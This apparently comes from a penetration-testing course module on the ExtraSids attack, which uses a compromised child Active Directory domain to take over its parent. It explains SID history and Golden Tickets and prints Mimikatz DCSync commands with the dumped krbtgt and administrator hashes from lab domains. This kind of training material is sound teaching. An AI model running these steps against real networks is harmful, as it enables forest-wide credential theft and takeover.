Attacking Domain Trusts - Child -> Parent Trusts - from Windows
SID History Primer
The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.
SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.
This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence.
ExtraSids Attack - Mimikatz
This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain that has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the SIDHistory to grant an account (or non-existent account) Enterprise Admin rights by modifying this attribute to contain the SID for the Enterprise Admins group, which will give us full access to the parent domain without actually being part of the group.
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
Now we can gather each piece of data required to perform the ExtraSids attack. First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account, which should be done periodically and definitely after a penetration test assessment where full domain compromise is reached.
Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account.
Obtaining the KRBTGT Account's NT Hash using Mimikatz
PS C:\tools\mimikatz\x64> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 02:01:23
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## >
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > / ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/1/2021 11:21:33 AM
Object Security ID : S-1-5-21-2806153819-209893948-922872689-502
Object Relative ID : 502
Hash NTLM: 9d765b482771505cbe97411065964d5f
ntlm- 0: 9d765b482771505cbe97411065964d5f
lm - 0: 69df324191d4a80f0ed100c10f20561e
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 8c6b7919c01a5c654c91922f9a13225c
* Primary:Kerberos-Newer-Keys *
Default Iterations : 4096
aes256_hmac (4096) : d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
aes128_hmac (4096) : ca289e175c372cebd18083983f88c03e
des_cbc_md5 (4096) : fee04c3d026d7538
* Primary:Kerberos *
des_cbc_md5 : fee04c3d026d7538
* Packages *
* Primary:WDigest *
01 71fc2147dcf21fed982e180c3ebc48b8
02 e193e66c97fb2ff16f352c25c06a5009
03 9b4087c331fcd37671b407cb4f0e44a2
04 71fc2147dcf21fed982e180c3ebc48b8
05 e193e66c97fb2ff16f352c25c06a5009
06 0da90377100224d5635e529d358f1409
07 71fc2147dcf21fed982e180c3ebc48b8
08 1763ae4e99694dcf66700106bb303aa5
09 024c0c0c71f6e1f89a8c3be922534f0d
10 3523e29569b4a45d20d99b7937f40326
11 1763ae4e99694dcf66700106bb303aa5
12 024c0c0c71f6e1f89a8c3be922534f0d
13 5f47d51dee42d3f9a52a2d464c291fe5
14 1763ae4e99694dcf66700106bb303aa5
15 b7196b13a4fc2a29c18de543912039c2
16 64689c7d74d2f2908330c62e47b34d75
17 023f316da4715dd596d4ae6d5b9049cc
18 fec7644b22077323cc9770c91d205269
19 5cacbc938eaeb1b3a58572dafed92d97
20 684ef5f716d49e4274a4ceb48d5fd6ba
21 99968ef6b4c440cbd652ce6718a9ba39
22 99968ef6b4c440cbd652ce6718a9ba39
23 fbd2d7aef9329e981cd1bfdef2924843
24 38653e1cf10018a3ae60fdb681241f1b
25 5efd3ccfb3589c3bd6d76738ceeffb92
26 dcd5dfeec024fe725edcaab5953d2011
27 d92dcf29cd473a6ebae4b3bca1e578a9
28 ff0382afc6adb89c00d5bf90cd5f4eca
29 d7d958214c25d0835547320a0f0faf49
We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above.
Next, we can use Get-DomainGroup from PowerView to obtain the SID for the Enterprise Admins group in the parent domain. We could also do this with the Get-ADGroup cmdlet with a command such as Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL".
Obtaining Enterprise Admins Group's SID using Get-DomainGroup
From here, it is possible to access any resources within the parent domain, and we could compromise the parent domain in several ways.
Listing the Entire C: Drive of the Domain Controller
PS C:\htb> ls \\academy-ea-dc01.inlanefreight.local\c$
Volume in drive \\academy-ea-dc01.inlanefreight.local\c$ has no label.
Volume Serial Number is B8B3-0D72
Directory of \\academy-ea-dc01.inlanefreight.local\c$
09/15/2018 12:19 AM <DIR> PerfLogs
10/06/2021 01:50 PM <DIR> Program Files
09/15/2018 02:06 AM <DIR> Program Files (x86)
11/19/2021 12:17 PM <DIR> Shares
10/06/2021 10:31 AM <DIR> Users
03/21/2022 12:18 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 18,080,178,176 bytes free
ExtraSids Attack - Rubeus
We can also perform this attack using Rubeus. First, again, we'll confirm that we cannot access the parent domain Domain Controller's file system.
Using ls to Confirm No Access Before Running Rubeus
PS C:\htb> ls \\academy-ea-dc01.inlanefreight.local\c$
ls : Access is denied
At line:1 char:1
+ ls \\academy-ea-dc01.inlanefreight.local\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\academy-ea-dc01.inlanefreight.local\c$:String) [Get-ChildItem], UnauthorizedAcces
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Next, we will formulate our Rubeus command using the data we retrieved above. The /rc4 flag is the NT hash for the KRBTGT account. The /sids flag will tell Rubeus to create our Golden Ticket giving us the same rights as members of the Enterprise Admins group in the parent domain.
Finally, we can test this access by performing a DCSync attack against the parent domain, targeting the lab_adm Domain Admin user.
Performing a DCSync Attack
PS C:\Tools\mimikatz\x64> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## >
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > / ***/
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'INLANEFREIGHT\lab_adm' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : lab_adm
SAM Username : lab_adm
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/27/2022 10:53:21 PM
Object Security ID : S-1-5-21-3842939050-3880317879-2865463114-1001
Object Relative ID : 1001
Hash NTLM: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 0: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 1: 663715a1a8b957e8e9943cc98ea451b6
lm - 0: 6053227db44e996fe16b107d9d1e95a0
When dealing with multiple domains and our target domain is not the same as the user's domain, we will need to specify the exact domain to perform the DCSync operation on the particular domain controller. The command for this would look like the following:
Attacking Domain Trusts - Child -> Parent Trusts - from Windows
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'INLANEFREIGHT\lab_adm' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : lab_adm
SAM Username : lab_adm
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/27/2022 10:53:21 PM
Object Security ID : S-1-5-21-3842939050-3880317879-2865463114-1001
Object Relative ID : 1001
Hash NTLM: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 0: 663715a1a8b957e8e9943cc98ea451b6
ntlm- 1: 663715a1a8b957e8e9943cc98ea451b6
lm - 0: 6053227db44e996fe16b107d9d1e95a0